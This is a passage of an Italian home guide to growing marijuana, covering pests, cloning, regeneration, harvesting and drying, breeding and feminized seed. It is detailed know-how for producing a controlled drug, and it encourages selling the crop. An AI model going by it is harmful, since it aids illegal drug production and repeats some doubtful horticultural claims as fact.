Usa una soluzione di sapone come Safer Insecticidal Soap per sbarazzarti della maggior parte 
dei problemi legati agli afidi. Usa alcuni estratti di tabacco e polvere di peperoncino 
piccante aggiunto a questo per gli acari. Dott. Bronnars Soap pu essere impiegato con alcuni 
detersivi per piatti in uno spruzzatore se vuoi risparmiare denaro.
Il piretro deve essere usato solo in circostanze estreme direttamente sulle piante, ma pu 
essere usato in uno sgabuzzino o in una serra negli angoli per eliminare ragni e simili. Si 
decompone entro una settimana in elementi non-tossici, e pu essere lavato da una pianta con 
soluzioni detergenti ed anche acqua pura. Trovo che il piretro sia la migliore soluzione per 
gli acari dei ragni, se  spruzzato sulle pianticelle ancora giovani fino alla prima 
fioritura. Nella fioritura avanzata il tabacco e una soluzione di peperoncino/sapone  la cosa 
migliore da farsi, con frequenza giornaliera, anche sul retro di tutte le foglie infette.
Gli acari dei ragni sono di gran lunga i peggiori aggressori del mio giardino. Ho finalmente 
imparato a non portare le piante dall'esterno all'interno. Sono sempre infettate da parassiti 
e minacciano di infettare l'intera zona di coltivazione al coperto. E' molto pi pratico 
lavorare con le stagioni e rigenerare le piante fuori in estate, piuttosto che portarle 
dentro per rigenerare sotto luce costante. Comincia a coltivare una pianta dentro e portala 
fuori in primavera per la fioritura. Prendi un raccolto o due, nutrila con azoto per tutta 
l'estate e si rigenerer naturalmente, per fiorire ancora in autunno.
Una volta che una pianta  stata portata fuori, lasciala fuori.


TRAPIANTARE 


Non si verificher alcuno shock o al massimo uno veramente modesto se sei rapido e sensibile 
nel maneggiare le tue piante. Accertati di dover trapiantare due volte, o meglio ancora, una 
volta se possibile, durante l'intero ciclo di crescita. Trapiantare rallenter la tua attivit 
produttiva. Ti porta via tempo,  difficile,  un lavoro duro, e mette a rischio le piante. 
Comincia con il pi capiente contenitore a tua disposizione, quadrato  meglio. Vaschette di 
plastica da 500 grammi sono OK, e bottiglie di coca cola da 2 litri tagliate in due possono 
essere abbastanza per il primo raccolto quando la pianta sta crescendo idroponicamente. Un 
contenitore parallelepipedo di plastica del latte o dell'acqua andr bene lo stesso.
Oppure comincia con semi e tagli di radici in vaschette di plastica da 500 grammi. E' meglio 
avere poche giovani piantine che molte visto che necessitano di trapianti continui. Queste 
vaschette pi grandi occupano solo un po' di spazio in pi, e consentono di trapiantare una 
sola volta prima di tirare su il primo raccolto. Trapiantala in un bricco d'acqua da 4 
litri (tagliato a circa 3 litri) prima di forzare la crescita dei fiori. Per rigenerare 
questa pianta dopo il raccolto, trapiantala in un vaso pi grande, una volta tornata nello 
stadio della crescita vegetativa, secchi di pittura da 20 litri funzionano bene se puoi 
risparmiare spazio, e un contenitore da 8-12 litri garantirebbe un secondo raccolto della 
pianta migliore del primo, anticipando la ricrescita vegetativa.
Una nota in pi: 
Uno studio russo ha dimostrato che le giovani pianticelle con almeno 10 cm di terra per 
sviluppare le radici in continuazione diventavano con pi probabilit femmine. La fonte che 
cito dice "Questo pu essere perch alcuni coltivatori hanno un rapporto femmina/maschio 
dell'ordine dell'80%/20%."


SESSO SUBITO


E' possibile stabilire il sesso di una pianta in anticipo, e quindi spostare le piante 
maschio fuori dall'area principale destinata alla coltivazione pi presto, coprendo il 
ramo pi basso di un pianta per 12 ore al giorno mentre  in uno stato vegetativo di luce 
costante. Usa una borsa di carta nera o simile per permettere il passaggio dell'aria mentre 
non fa filtrare la luce. Assicurati di approntare un ciclo regolare per questi rami coperti. 
Se permetti alla luce di raggiungerli durante il periodo di buio, non possono affatto 
indicarlo in anticipo.
Usa una lente d'ingrandimento per osservare in anticipo il tipo di sesso dei fiori. Una 
pianta maschio avr un fiore piccolo (carta da gioco) osservando un pre-fiore con un gambo 
piccolo al di sotto di esso. Un fiore femmina  di solito a singolo o doppio pistillo, 
bianco e sottile, che emerge da un calice immaturo.
Alcune persone preferiscono preforzare le piante quando sono alte 20 cm, con l'intenzione 
di eliminare i maschi. Quando coltivano all'aperto, molti coltivatori non desiderano perdere 
tempo, spazio o energia per le piante maschio. Soltanto mettono le piante in un ciclo di luce
di 12 ore per 2 settimane, separano le femmine dai maschi, quindi riportano i cicli di luce a 
18-24 ore per continuare la crescita vegetativa per le femmine. Ricordati, questo  un 
processo che porta via tempo e pu posticipare la crescita delle piante di 2 settimane. 
Non preforzare le piante a meno che tu non abbia molto tempo. Soltanto copri un ramo per 
pianta con carta nera (impermeabile alla luce, con passaggi d'aria) 12 ore ogni giorno sotto 
luce costante per forzare la prefioritura e separarle prima.


RIGENERAZIONE


E' possibile fare il raccolto delle piante e poi ringiovanirle vegetativamente per un 
secondo e anche un terzo raccolto. Un secondo raccolto pu essere realizzato in meno di 
6-8 settimane. Dal momento che lo stelo della pianta e le radici sono gi formati, la 
pianta pu produrre un secondo, e anche un terzo raccolto di gemme in poco pi della met 
del tempo del raccolto originale. Quando fai il raccolto, taglia il 1/3 della pianta pi 
alto. Lascia i gruppi di foglie pi rigogliosi nel centro della pianta, togliendo con molta 
attenzione i germogli via dai rami. Nel 1/3 della pianta pi basso, cogli alla fine i fiori, 
ma lascia parecchi piccoli fiori su ogni ramo. Questi saranno la parte della pianta che verr 
rigenerata. Le molte gemme che hai lasciato sulla pianta, rigenereranno il pi velocemente 
possibile. Nutri la pianta con Miracle Grow o qualche altro fertilizzante ad alto contenuto 
di azoto subito dopo il raccolto. Quando intendi rigenerare una pianta, accertati che non 
abbia mai carenza di azoto durante la maturazione, o tutte le foglie esposte al sole cadranno, 
e la tua pianta non avr abbastanza foglie per vivere dopo il raccolto.
Una pianta dopo il raccolto pu essere portata dentro per il ringiovanimento sotto luce 
continua o lasciata all'aperto l'estate per ringiovanire con la lunghezza naturale dei 
giorni. Ci vorranno 7-14 giorni per vedere i segni di un nuovo sviluppo quando rigeneri 
una pianta. Come abbiamo detto prima, ed in contrasto con gli esempi di sviluppo normale, 
i rami inferiori saranno i primi a sviluppare una nuova crescita vegetativa. Lascia crescere 
la pianta vegetativamente per un po', quindi portala fuori di nuovo per la rifioritura. 
Oppure lasciala dentro per la potatura vegetativa. Ora hai due o tre generazioni di piante 
che crescono, ed avrai bisogno di pi spazio fuori. Ma farai il raccolto con il doppio della 
frequenza. Al ritmo di uno ogni 30 giorni, dal momento che hai nuovi cloni e piccole piantine 
che crescono, piante vegetative pronte per la fioritura e piante rigenerate che a loro volta 
fioriscono.
Rigenerare al coperto pu creare problemi se le tue piante sono infettate con parassiti. Pu 
essere meglio creare un'area separata dentro che non permetter alle tue piante di infettare 
la principale area di coltivazione al coperto. Un'alternativa alla rigenerazione al coperto  
rigenerare fuori durante l'estate. Solamente prendi un raccolto in giugno, poi permetti alla 
pianta di rigenerare lasciando alcune gemme sui rami bassi della pianta e dedicando il 1/3 
centrale delle foglie della pianta al raccolto. Nutrile con azoto, ed assicurati che prendano 
molto sole. Rigenerer per tutta l'estate e sar piuttosto grande per l'autunno, quando 
comincer a fiorire di nuovo spontaneamente.


POTATURA 

Le piante che sono rigenerate, clonate ed anche cresciute da semi avranno bisogno di essere 
potate in certi punti per spingerle a produrre il pi possibile e a mantenersi rigogliose. 
Potare i rami pi bassi crea un maggior flusso d'aria sotto le piante in una situazione al 
coperto e crea ritagli di piante per la clonazione. Inoltre concentra l'attivit della pianta 
ai rami superiori che ricevono la maggior parte della luce, incrementando la produzione.
Le piante che sono state rigenerate abbisognano di una minor potatura in fase di crescita in 
modo che la principale crescita rigenerata otterr tutta l'energia della pianta. Questo 
significa che una volta che la pianta ha cominciato a rigenerare una buona parte della 
crescita, i rami pi bassi che saranno in ombra o poco robusti dovrebbero andarsene. Lo 
sviluppo deve essere sfoltito sui rami superiori in modo che rimanga solo la crescita pi 
robusta.
Un piacevole aspetto del rigenerare le piante  che alcune piccole gemme lasciate sulla 
pianta in vista della rigenerazione non daranno frutto a nuova crescita e potranno quindi 
essere raccolte per fumarle. La pianta pu fornire molto materiale fumabile se preso prima 
che tutti i fiori maturi si secchino e muoiano con l'arrivo della nuova crescita vegetativa.
Cerca di potare due volte una pianta rigenerata. Una volta quando comincia a rigenerare: 
raccogli ogni gemma che non germoglia con la nuova crescita e fumala. Quindi dopo, pota di 
nuovo per prendere i ritagli pi bassi da clonare e sfoltisci la crescita superiore in modo 
da produrre grosse gemme.
Se una pianta rigenerata non viene affatto potata, la pianta risulta piena di diramazioni, 
non crea gemme grandi ed il prodotto totale sar considerevolmente ridotto.


RACCOGLIERE ED ESSICCARE

Fare il raccolto vuol dire cogliere i frutti di tanto duro lavoro, ed  il tempo pi 
piacevole che impiegherai nel tuo giardino.
Si fa il raccolto alle piante quando i fiori sono maturi. Generalmente, si stabilisce 
che un fiore  maturo quando i pistilli iniziano a diventare marroni, arancioni, ecc.. e 
cominciano a regredire in un falso baccello. I baccelli si gonfiano con resine normalmente 
riservate alla produzione dei semi, e cos otteniamo gemme mature con peli rossi e dorati.
E' interessante notare che il tempo del raccolto controlla lo sviluppo delle gemme. Se si  
fatto il raccolto in anticipo con solo alcuni dei pistilli che hanno cambiato colore, le 
gemme avranno un contenuto di THC pi puro ed avranno meno THC che muta in CBD e CBN. Le 
sostanze psicotrope creeranno l'aroma dell'erba, e controlleranno il grado di insensibilit e 
di sballo correlato ad un'elevata concentrazione. Un contenuto di THC puro crea un effetto 
molto cerebrale, mentre un contenuto elevato di THC, di CBD e di CBN render le piante pi 
inclini a suscitare intontimento o un senso di annebbiamento. Le gemme colte tardi, quando 
pienamente maturate conterranno di norma questi elevati livelli di CBN, CBD e certamente 
non possono essere ci che preferisci una volta che hai provato campioni differenti colti 
in momenti differenti. Non prestare ascolto agli esperti, decidi tu in base a ci che 
preferisci.
Ricordati, una gemma pesa di pi quando completamente matura. E' ci che alla maggior parte 
dei coltivatori piace vendere, ma prendi alcune giovani gemme per te, ogni settimana 
precedente il raccolto, e decidi come ti pare. Coltiva il resto fino ad una piena maturit 
se progetti di venderlo.
Molti coltivatori in erba (nel senso che sono nuovi del giro) vogliono raccogliere in 
anticipo, perch sono impazienti. Questo  OK! Soltanto devi prendere le gemme dalla cima o 
dalla parte centrale della pianta. Lascia maturare il resto. Spesso, le cime delle piante 
matureranno per prime. Raccoglile e lascia continuare il resto della pianta a maturare. 
Noterai che le gemme pi basse diventano pi grandi e pi gonfie e increspate quando 
raggiungono una completa maturazione. Con pi luce a disposizione nella parte bassa della 
pianta ora, la pianta produce di pi in questo modo con il passare del tempo, rispetto a 
prendere un singolo raccolto.
Serviti di una lente d'ingrandimento per cercare di vedere i tricomi capitati (piccoli 
cristalli di THC sulle gemme). Se sono soprattutto chiari, non marroni, il punto massimo 
dell'aroma floreale  prossimo. Una volta che sono diventati per lo pi tendenti al 
marrone nel colore, la concentrazione di THC comincia a scemare e la potenza ottimale del 
fiore si allontana, calando rapidamente con l'esposizione alla luce e al vento. Non fare 
il raccolto troppo tardi! E' facile stare molto attenti e raccogliere dopo che buona parte 
della potenza se ne  andata. Controlla le piante ed impara a riconoscere il picco della 
potenza floreale.
Non conservare l'erba al sole, perch riduce la potenza. Conservala a lungo stendendo le 
gemme superiori in basso in uno spazio ventilato. Questo  tutto ci di cui hai bisogno 
per avere un gran raccolto. Essiccare in un sacchetto di carta funziona ugualmente, e pu 
essere molto pi conveniente. La gemma ha un aroma fantastico quando  essiccata lentamente 
per la durata di una settimana o due.
Se hai molta fretta,  OK essiccare una piccola quantit in-tra fogli di carta o in un 
sacchetto di carta in un forno a microonde. Vacci piano e controllale, non bruciarle. 
Posiziona la manopola sulla funzione di scongelamento per una pi lenta, migliore 
essiccazione, sebbene in questo modo sar un fumo acre.
Un disidratatore di alimenti o una macchina per conservare il cibo essiccher la tua maria 
in poche ore, ma non avr lo stesso aroma di una essiccata lentamente, anche se sar molto 
simile. E questo accelerer il tuo periodo di raccolto (che pu essere snervante, con tutta 
questa erba sparpagliata ad essiccare).
Le gemme secche fino ai gambi sono abbastanza friabili da sbriciolare, conservale quindi in 
un  contenitore sigillato, facendo passare aria e rigirando le gemme ogni giorno per due 
settimane.
Una volta un coltivatore esperto mi ha detto di essiccare in un'area attigua alla casa (come 
il garage) in modo che la temperatura di giorno si alza e di notte si abbassa, mentre la 
pianta si essicca. Se tratti la pianta come se fosse ancora viva, questa user una parte 
della sua clorofilla durante il processo di essiccazione, ed il fumo sar meno acre.


CLONARE

La clonazione  una riproduzione asessuata. Vengono effettuati dei tagli da una pianta madre 
in crescita vegetativa e vengono immersi in ambiente idroponico per essere coltivati come 
piante distinte. Il risultato sar piante identiche in tutto alla pianta madre.
La clonazione mantiene le caratteristiche della tua pianta preferita. La clonazione pu 
produrre un oceano di verde da una sola pianta, per questo  un mezzo potente per grandi 
raccolti, e ti permetter di riempire uno stanzino rapidamente con le tue piante favorite. 
Quando trovi una pianta che vorresti ti fosse "amica" per il resto della tua vita, puoi 
mantenere in vita le caratteristiche genetiche di quella pianta per decenni e passarle ai 
figli dei tuoi figli. Diffondile e condividile con altri, per conservare una copia, dovesse 
mai la tua discendenza di piante estinguersi. Un clone pu essere preso da un altro clone 
almeno 20 volte, e probabilmente di pi, cos non preoccuparti del mito del vigore ridotto. 
Molti rapporti indicano che non  un problema.
La clonazione ti esporr al rischio di funghi o parassiti che distruggono tutto il raccolto, 
cos  importante scegliere piante che mostrano buona resistenza ai funghi e agli animali 
nocivi. Scegli la pianta che senti sar la pi affidabile da riprodurre in larga scala, 
basandoti sullo stato di salute, sul tasso di accrescimento, sulla resistenza ai parassiti e, 
naturalmente, sulla potenza del fumo. La qualit dell'intensit e del tipo di sballo che 
avrai, sar un fattore determinante da non trascurare.
Fai dei tagli per clonare prima di spostare le piante dall'area di crescita vegetativa 
all'area di fioritura. I rami bassi sono tagliati per incrementare la circolazione dell'aria 
sotto la volta verde. I cloni che hanno attecchito sono spostati nell'area di crescita 
vegetativa, e i nuovi cloni sono fatti partire nell'area di clonazione usando i tagli dei 
rami inferiori. Ogni ciclo di crescita impiegher dalle 4 alle 8 settimane, cos puoi 
coltivare in continuazione in 3 stadi, e raccogliere ogni 6-8 settimane.
Alcuni tipi di piante sono pi difficili da clonare che altri. E' riportato che le piante con 
grandi germogli non si clonano molto bene. Una delle mie piante favorite, Mr. Kona,  la pi 
sbalorditiva erba che abbia mai fumato, ma clonarla  veramente un'impresa. Che sfida! Ho 
osservato altre variet che avevano attecchito molto pi rapidamente, ma poi non mi ha fatto 
il che minimo effetto! Una volta che hai trovato quella psicoattiva, quasi le propriet 
allucinogene di alcuni ibridi Indica/Sativa, non vorrai pi fumare un'Indica pura. L'Indica 
 comunque un fantastico medicinale, cos preferisco coltivare anche alcuni pezzi puri.
Se fai il raccolto di una pianta, puoi assaggiarlo, e decidere di clonare. Scegli i tuoi 
favoriti 2 o 3 tipi differenti di piante da clonare, in base all'esito dell'assaggio del 
raccolto. Le piante che vuoi clonare possono essere rigenerate mettendole sotto luce 
costante. In poche settimane avrai molti tagli vegetativi pronti per la clonazione e per 
preservare le tue piante preferite. Tieni sempre una pianta madre in stato vegetativo per 
ogni specie che vuoi mantenere in vita. Se porti alla fioritura tutti i tuoi cloni, puoi 
finire con l'eliminare una specie se non possiedi una pianta destinata ad essere madre. Ho 
ucciso accidentalmente una specie sacra in questo modo; le mie piante, dopo il raccolto, 
non sono riuscite a rigenerare e la specie si sarebbe completamente estinta se non l'avessi 
precedentemente data ad amici perch la coltivassero anche loro. Sono stato fortunato, ed 
un amico mi ha preparato un altro clone di questa specie da coltivare come pianta madre per 
la produzione di nuovi cloni.
Dopo due mesi ogni pianta di marijuana pu essere clonata. Piante fiorite possono essere 
clonate, ma la procedura pu essere notevolmente pi lunga. E' meglio attendere, e rigenerare 
vegetativamente piante che hanno subito raccolti. Una singola pianta rigenerata/raccolta 
pu generare centinaia di cloni. Prima di fare dei tagli, lascia la pianta senza azoto per 
almeno una settimana, in modo che la pianta non diventi estremamente verde, cos ci vorr pi 
tempo per attecchire. Prendi i tagli dal 1/3 pi basso della pianta, quando fai  una potatura 
ordinaria. Taglia giovani piccioli da uno stadio vegetativo, una pianta matura alta 8-12 cm 
con un gambo del diametro di 2,5-5 mm. Tagliala con una lama di rasoio sterile o con un 
coltello di precisione (passato sul fuoco) ed immergi l'estremit inferiore del taglio del 
clone in una vasca di acqua distillata con l'aggiunta di 1/4 di cucchiaino di 
Peters 5-50-17 ogni 4 litri. Poi, taglia via gli ultimi 5 mm mentre viene immersa, facendo 
un taglio diagonale. Rimuovi il clone dalla vasca e infilalo in una soluzione liquida per 
cloni seguendo le indicazioni sull'etichetta. Cospargilo di RootToneF e mettilo in vaschetta 
o in un ambiente per la clonazione. Anche le piante fiorite possono essere clonate, ma ci 
pu volere pi tempo, e non pu avere un indice di successo molto elevato.  Clonare diventa 
pi rapido con le soluzioni liquide per sviluppare le radici, in una vaschetta scaldata e 
areata, con illuminazione attenuata ed alta umidit. Mettere i tagli in cubi da 3 cm d lana 
di roccia in una vaschetta funziona ugualmente bene. In uno sgabuzzino puoi recuperare 
spazio sopra l'area di coltivazione in modo che il calore della lampada scaldi la vaschetta 
(raccolta passiva) e ti consenta di risparmiare la spesa e la seccatura di un riscaldatore 
per acquari (24 dollari) o un sistema di riscaldamento agricolo (costoso). Una doppia 
lampada fluorescente da 10 cm sar perfetta. Lascia le lampade accese per 24 ore al giorno. 
I tagli devono mettere radici in 2-3 settimane.
Ho trovato solo una soluzione liquida a base di ormoni per mettere radici che non costava 
oltre i 10 dollari. (Olivia's Gel ne costava 12 per un flacone da 50 grammi. Cazzo, cos' '
sta roba, oro?) Ho trovato alcuni dipNgrow (lett: immergi e coltiva) per 9 dollari, mi sono 
ritenuto fortunato, e ho acquistato una vaschetta e un coperchio trasparente per 7 dollari. 
Un coperchio trasparente per vaschette o una copertura per serre  indispensabile per 
portare l'umidit al 90% (livello della serra). L'ormone liquido per mettere radici sembra 
essere molto pi efficace delle polveri. Alcuni tipi disponibili sono Olivia's, Woods, e 
dipNgrow.
Miscela una soluzione per cloni diluita di nutrimenti per piante ad alto contenuto di 
fosforo (high P) come il Peter's 5-50-17, elementi in tracce e sale inglese e quindi 
immergi le piante in una soluzione per la formazione di radici secondo le istruzioni 
sull'etichetta. Tutti i nutrimenti sopra citati dovrebbero essere aggiunti in quantit 
estremamente piccole, il 25% di ci che normalmente sarebbe usato per crescere le piante. 
O serviti di una soluzione gi preparata come l'Olivia's Rooting Solution. E' stato 
riportato che lo sciroppo di mais integra la richiesta di zuccheri da parte della pianta 
durante la fase della clonazione, dal momento che  composto di zuccheri vegetali.
Usa anche un fungicida in polvere, come il RoottoneF per accertarti che i cloni non 
marciscano grazie ai funghi. Questo  importante, dal momento che i cloni e i funghi 
gradiscono le condizioni che hai ricreato per un buon attecchimento: luce mite; 22-26 
gradi; umidit elevata.
Nella lana di roccia non c' alcun bisogno di ossigenare la soluzione, soltanto tieni i cubi 
in 0,5 cm di soluzione in modo che loro stiano stabili e continuamente inumidite. Cerca di 
tenere i cloni uniformemente distanziati, e spruzza loro acqua una volta al giorno per 
mantenerli umidi e freschi. Togli i cloni se sono malaticci e morenti, per tenerli a 
distanza da quelli sani.
Un altro metodo  quello di tenere a galla i tagli in una vaschetta piena di soluzione su 
pannelli di polistirene (polistirolo) a disposizione, o fogli di stirene (materiale per 
spedizioni/imballaggi) con buchi fatti con un punzone, in modo che le cime e le foglie siano 
fuori dall'acqua. Togli tutte le foglie grandi, lasciando solo le foglie pi piccole in cima 
per ridurre la domanda nei nuovi gambi che mettono radici. Ossigena la soluzione della 
vaschetta con una pompa d'aria e una pietra pomice. Tieni la soluzione a 22-26 gradi per 
ottenere i migliori risultati. Cambia la soluzione ogni giorno se non usi una pietra pomice 
e una pompa, in modo che l'ossigeno sia sempre disponibile ai cloni. Una settimana pi tardi, 
stacca le foglie gialle dai tagli per ridurre la richiesta d'acqua quando i cloni cominciano 
a mettere radici e attecchiscono.
Compra una vaschetta con un coperchio trasparente appositamente studiato per la formazione 
delle radici in un negozio specializzato in articoli per giardinaggio al coperto. Devi tenere 
l'umidit molto alta per i cloni. Metti i tagli in una vaschetta per il ghiaccio coperta con 
cellophane ed una luce brillante in basso se non vuoi spendere soldi per la vaschetta e il 
coperchio.
E' anche possibile piazzare direttamente un taglio bagnato in un blocco umido di schiuma 
floreale con buchi fatti con punzoni, o vermiculite in una tazza; assicurati che i tagli 
attecchiscano in un ambiente costantemente umido. Cubetti di torba in bustine non sono 
raccomandati, come indicano risultati di rapporti pubblicati secondo i quali non erano 
buoni per i cloni che devono mettere radici. Metti i cubetti iniziali in una vaschetta di 
soluzione. Controlla due volte al giorno per essere sicuro che i cubi siano umidi, non 
inzuppati, n asciutti. Dopo di 2-3 settimane, appariranno delle radichette in fondo ai 
baccelli. Trapianta a questo punto all'area di coltivazione, facendo attenzione a non 
scompigliare ogni radice esposta.
Un coltivatore ci scrive:
Ho virtualmente cercato di far attecchire tutti i cloni attenendomi a questo schema:
0.	Prepara i tagli rimuovendo le foglie grandi sulla punta; lascia che si riprenda dal 
taglio.
1.	Mentre li tieni immersi in acqua, fai un taglio diagonale sull'estremit inferiore del 
gambo affinch metta radici. 
2.	Immergili in Rootone, quindi infilza il gambo per circa 5 cm in una vaschetta da mezzo 
chilo con met vermiculite, met perlite, che hai messo in un raffreddatore di polistirolo.
3.	Spruzza i tagli con una completa soluzione fertilizzante molto leggera.  
4.	Copri la cima del raffreddatore con Saran Wrap, quindi fai dei buchi per la ventilazione. 
5.	Tieni il raffreddatore ad una temperatura relativamente mite, luce bassa, e spruzza i 
tagli giornalmente.
6.	I tagli devono mettere radici in circa 3 settimane.
La clonazione non  semplice quanto cominciare dai semi. Con i semi puoi avere piante alte 
50 cm in 6 settimane o meno. Con i cloni ci possono volere 6 settimane perch la pianta 
germogli le radici e la nuova crescita. I semi risultano facilmente due volte pi veloci se 
possiedi uno spazio interno vuoto inutilizzato che richiede di essere messo in uso 
rapidamente. Riproduci sempre poche gemme per produrre semi, anche se ritieni di 
clonare per la maggior parte del tempo, potresti perdere tutto e non avere nulla, e in tal 
caso i tuoi semi potrebbero salvarti il culo.
Clonare nella lana di roccia sembra funzionare alla grande, e non  richiesta alcuna pompa 
d'aria. Ho pagato 9 dollari per 98 cubi di lana di roccia per cominciare. Una vaschetta di 
plastica  disponibile per 0,95 dollari e contiene 77 cubi in caselle consentendo ai cubi di 
essere tenuti in un contenitore di soluzione nutriente. Possono essere facilmente rimossi e 
messi in un cubo pi grande di lana di roccia per la coltivazione quando i tagli cominciano 
a mettere radici.



RIPRODUZIONE

E' possibile riprodurre e scegliere pi velocemente i tagli da piante che crescono, 
fioriscono, e maturano. Alcune piante saranno naturalmente migliori di altre a questo 
riguardo, ed  facile selezionare non solo le piante pi potenti da clonare o riprodurre, 
ma ugualmente le piante che crescono/fioriscono pi velocemente. Trova la tua pianta dalla 
crescita pi rapida, e riproducila con il tuo maschio "dalla miglior altezza" per una rapida 
fioritura e una potente discendenza della specie. Clona la tua pianta pi rapida, pi alta 
per avere un giardino a singolo raccolto nel minor tempo possibile. Con il passare del tempo, 
risparmierai una bella attesa nel maturare le tue piante.
Quando un maschio comincia a fiorire (2-4 settimane prima delle femmine) dovrebbe essere 
allontanato dalle femmine in modo che non possa impollinarle. Deve essere portato in un'area 
separata. Ogni posto che garantisce solo qualche ora di luce al giorno dovrebbe essere 
adeguato, anche vicino ad una finestra in una stanza separata all'interno della casa. Metti 
un giornale o un vetro sotto la pianta maschio per raccogliere il polline quando i fiori lo 
emettono.
Tieni un maschio vivo indefinitamente incurvandone la cima rigidamente e mantenendolo in uno 
stato di shock non forte in modo da ritardarne la maturazione. Oppure prendi le cime quando 
maturano e metti i rami in acqua, sopra un pezzo di lastra di vetro. Scuoti i rami ogni 
mattina perch rilascino il polline sopra il vetro e quindi scartalo con una lama di rasoio 
per raccoglierlo. Un maschio potato in questa maniera resta vivo indefinitamente e continuer 
a produrre fiori se riceve adeguati periodi di buio. Questo  molto meglio che mettere il 
polline nel congelatore! Il polline fresco  sempre meglio.
Salva il polline in un sacchetto a prova d'aria nel congelatore. Sar buono per circa un mese. 
Possono passare pi e pi settimane prima che le femmine siano pronte per l'impollinazione. 
Metti una carta assorbente nel sacchetto con il quale agire una volta scongelato.
Una pianta  pronta per l'impollinazione 2 settimane dopo che i grappoli dei fiori femmina 
appaiono per la prima volta. Se la impollini troppo presto, non pu funzionare. Aspetta fino 
a quando i fiori femmina si sono formati bene, ma soprattutto quando i peli stanno comparendo.
Spegni tutti i ventilatori. Usa un sacchetto di carta per impollinare un ramo di una pianta 
femmina. Usa polline diverso preso da due maschi su rami separati. Copri il sacchetto attorno 
al ramo e sigillalo all'inizio del ramo. Scuoti il ramo vigorosamente. Bagna il sacchetto di 
carta dopo alcuni minuti con uno spruzzatore e quindi rimuovilo con molta attenzione. Usa 
anche grandi borse di plastica con chiusura a lampo. Infila la borsa sul ramo del maschio e 
scuoti il polline che si libera. Rimuovi attentamente quello cattivo e chiudi la lampo. 
Dovrebbe essere ricco di polvere di polline. Per impollinare, mettilo sopra un singolo ramo 
della femmina, chiudendo la lampo lateralmente intorno al gambo in modo che nessun polline 
sfugga all'esterno. Scuoti la borsa ed il gambo allo stesso tempo. Lasciali stabilirsi per 
un'ora o due e scuotila di nuovo. Toglila alcune ore pi tardi. Il tuo ramo  ora ben 
impollinato e deve mostrare i segni di una visibile  produzione di semi in 2 settimane, 
con  semi maturi che fendono i calici entro 3-6 settimane. Un ramo impollinato pu produrre 
centinaia di semi, cos in molti casi non dovrebbe essere necessario impollinare pi di uno 
o due rami.
Quando incroci due variet diverse, verr creato una terzo tipo di pianta. Se conosci quali 
caratteristiche stai cercando in una specie nuova, avrai bisogno di diverse piante da 
scegliere per avere una probabilit maggiore di trovare tutte le qualit desiderate. Qualche 
volta, se le due piante incrociate possiedono geni dominanti per determinate caratteristiche, 
sar impossibile ottenere la pianta che desideri da un singolo incrocio. In questo caso  
necessario incrociare due piante dallo stesso lotto di semi risultanti dall'incrocio iniziale. 
In questo modo si potranno liberare i geni recessivi, e le caratteristiche della pianta 
che desideri possono essere ottenute solo in questa maniera.
Di solito,  preferibile incrociare soltanto due specie che sono molto differenti. In 
questa maniera uno solo normalmente arriva al punto descritto come "vigore ibrido." In 
altro parole, spesso le specie migliori sono create prendendo due specie molto diverse 
tra loro ed accoppiate. Le piante meno robuste possono essere il risultato di un incrocio, 
dal momento che assimilano i tratti del gene recessivo che pu portare ad una diminuzione 
della potenza.
La specie ibrida sar completamente differente l'una dall'altra. Ogni pianta cresciuta 
dallo stesso lotto di semi raccolti dalla stessa pianta, sar diversa. E' quindi necessario 
provare ciascuna pianta separatamente e decidere per ognuna se le caratteristiche sono di 
tuo gradimento. Se trovi una che sembra essere di gran lunga superiore alle altre in termini 
di fioritura precoce, alta produttivit e che ti d uno sballo strafico, quella  la pianta 
da clonare e da riprodurre in continuazione.
La genetica avanzata va ben oltre lo scopo di questo lavoro. Consulta: 'Marijuana Botany' 
(Botanica della Marijuana) di Smith, per informazioni pi dettagliate su questo campo.



SINSEMILLIA

Quando ad una pianta femmina non  permessa l'impollinazione, cresce ricca di resina 
indispensabile per la produzione dei semi. Falsi baccelli si gonfiano con resina carica di 
THC ed i pistilli diventano rossi ed arancioni e si ritirano nei baccelli. Allora  il 
momento di fare il raccolto alla pianta. I semi non fanno parte della gemma quando i fiori 
maturano. Questo si chiama Sinsemillia e significa semplicemente "senza semi".


IMPOLLINAZIONE

E' possibile incrociare le tue due piante femmine favorite per generare una nuova specie 
di semi che produrr tutte le piante femmine. Preferibilmente, queste due piante dovranno 
essere di tipo differente, non da semi provenienti dalla stessa madre.
Questo creer la specie migliore, dal momento che non porter all'incrocio. E' pi facile 
stimare la qualit delle piante femmine rispetto a quelle maschio, visto che il fumo  pi 
potente e pi facile da giudicare  la qualit migliore. Le piante nate da semi in questa 
maniera saranno tutte piante femmine perch non ci sar la possibilit di avere cromosomi 
maschio da genitori femmina.
Usa Acido Gibberellico (gibberellina) su un ramo di una pianta femmina per produrre fiori 
maschi. L'Acido Gibberellico viene venduto nei negozi di articoli per serre che tengono 
prodotti per la riproduzione e ibridazione di piante. Spruzzalo sulla pianta una volta 
ogni giorno per 10 giorni con 100 parti per milione di acido gibberellico. Quando si formano 
i fiori maschi, impollina i fiori dell'altra pianta femmina che hai scelto. Impollina 
soltanto un ramo a meno che tu non voglia un fottio di semi! Una volta che il ramo ha 
fiori maschi, taglia il ramo e mettilo ad attecchire in acqua, con un vetro al di sotto 
per recuperare il polline maschio quando cade. Usa una soluzione per mettere radici simile 
alla precedente soluzione per la clonazione. Raccogli il polline con un sacchetto di 
plastica messo sul ramo e scuotilo. Usa una lama di rasoio per accumulare il polline 
caduto ed aggiungere pure quello nel sacchetto.
E' anche possibile impollinare i fiori della pianta su cui crei i fiori maschi, 
incrociandoli con se stessi. Questo viene usato per conservare le caratteristiche 
di piante speciali. Anche con la clonazione si conservano le caratteristiche delle 
piante, ma non si potranno conservare i semi per impiegarli in un secondo tempo. 
Incrociare una pianta con se stessa pu portare a problemi di incrocio, cos non pu essere 
una soluzione definitiva nella maggior parte dei casi.
Una volta ho provato ad usare acido gibberellico, spruzzato su una femmina sana, ogni giorno 
per oltre una settimana. Non  apparso alcun fiore maschio sulla pianta. I suoi benefici 
pertanto possono essere variabili.



ODORI E IONI NEGATIVI

Generatori di ioni negativi sono stati usati per anni per ridurre gli odori in una stanza 
di coltivazione, ma sono giunti rapporti secondo i quali un generatore di ioni negativi 
aumenta la velocit di accrescimento e la produzione. Non c' alcuna evidenza che possa 
confermarlo, comunque ha un senso, dovuto al fatto che le persone e gli animali sembrano 
essere alterati positivamente dagli ioni negativi nell'aria, cos a maggior ragione possono 
"sentirsi" meglio le piante. Prova a metterne uno nella stanza di coltivazione. Puoi notare 
